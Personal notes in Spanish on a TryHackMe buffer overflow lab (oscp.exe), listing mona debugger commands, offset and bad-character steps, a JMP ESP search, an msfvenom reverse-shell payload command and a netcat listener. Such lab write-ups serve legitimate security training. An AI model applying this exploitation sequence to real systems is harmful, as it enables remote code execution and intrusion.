Estos son los pasos que seguimos en BufferOverflow2 de TryHackMe

Buscamos el archivo oscp.exe y corremos Immunity Debugger

!mona config -set workingfolder c:\mona\%p

/usr/share/metasploit-framework/tools/exploit/pattern\_create.rb -l 1100

python3 exploit.py

!mona findmsp -distance 1100

!mona bytearray -b "\\x00"

Ahora cambiamos el offset en el archivo de exploit.py a 634 Y tambien rtn le ponemos un valor de "BBBB"

python3 bad_characters.py

Reiniciamos app

python3 exploit.py

!mona compare -f C:\mona\\oscp\bytearray.bin -a 022AFA30

los bad_chars son 00 23 24 3c 3d 83 84 ba bb

Quitamos el 23 del payload en el script

![[Pasted image 20210615114825.png]]

Donde dice ESP le damos click derecho y Follow in Dump

Ahora los bad chars serian \x00\x23\x3c

Quitamos x3c

Reiniciamos app

python3 exploit.py

Donde dice ESP le damos click derecho y Follow in Dump

Ahora los bad chars serian \x00\x23\x3c\x83

#no vemos 83

Quitamos x83

Reiniciamos app

python3 exploit.py

Donde dice ESP le damos click derecho y Follow in Dump ![[Pasted image 20210615120541.png]]

Ahora los bad chars serian \x00\x23\x3c\x83\xba

#no vemos ba

Quitamos xba

Reiniciamos app

python3 exploit.py

Donde dice ESP le damos click derecho y Follow in Dump

Ya no seguimos mas porque bb si se encuentra en el dump

!mona jmp -r esp -cpb "\x00\x23\x3c\x83\xba"

Agarramos el numero 625011bb

msfvenom -p windows/shell\_reverse\_tcp LHOST=YOUR\_IP LPORT=4444 EXITFUNC=thread -b "\\x00" -f c

Cambiamos el payload con lo que nos salio con msfvenom

Declaramos el valor de padding a "\x90" * 16

nc -lvnp 4444